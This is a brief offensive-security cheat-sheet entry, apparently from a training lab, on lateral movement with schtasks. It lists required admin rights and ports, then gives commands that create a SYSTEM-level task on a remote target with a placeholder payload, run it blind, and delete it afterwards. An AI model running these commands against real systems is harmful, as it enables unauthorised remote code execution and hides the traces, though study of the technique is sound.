Requirements
- Administrator privileges on remote machine (i.e. domain admin)
- Ports: 135/TCP, 49152-65535/TCP (RPC)
# Since the task will be run manually, /sd and /st does not matter
schtasks /s TARGET /RU "SYSTEM" /create /tn "TaskName" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "TaskName" # blind
schtasks /S TARGET /TN "THMtask1" /DELETE /F # clean-up